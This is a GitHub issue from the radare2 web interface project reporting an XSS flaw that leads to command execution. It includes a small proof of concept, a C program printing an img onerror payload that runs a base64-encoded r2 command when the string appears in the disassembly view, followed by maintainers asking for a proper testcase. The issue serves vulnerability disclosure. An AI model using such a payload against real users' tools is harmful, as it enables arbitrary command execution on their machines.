Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

The enyo and material web interfaces are vulnerable to XSS #137

Open
Maijin opened this issue Mar 8, 2017 · 4 comments
Open

The enyo and material web interfaces are vulnerable to XSS #137

Maijin opened this issue Mar 8, 2017 · 4 comments

Comments

@Maijin
Copy link

Maijin commented Mar 8, 2017

Again, this leads to arbitrary command execution.
PoC

void main()
{
    printf("<img src=k onerror=r2.cmd(atob('ZWNobyAxID4gL3RtcC9ib28='))></img>");
}

Edit:
To clarify, this occurs when the string from the binary is show in the disassembly window.

radareorg/radare2#4337

@novia713
Copy link
Collaborator

novia713 commented Oct 1, 2017

been looking for this in the web-ui and didn't found it.
AFAIK this code is in r2, not in the webui.

if i'm wrong, please somebody tells me where is this code.

@radare
Copy link
Collaborator

radare commented Oct 10, 2017

wat

@radare
Copy link
Collaborator

radare commented Oct 10, 2017

please @Maijin elaborate on this and provide a proper testcase

@Maijin
Copy link
Author

Maijin commented Oct 10, 2017

I have no idea what this is about, I just ripped of the issue from radare2 repo

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants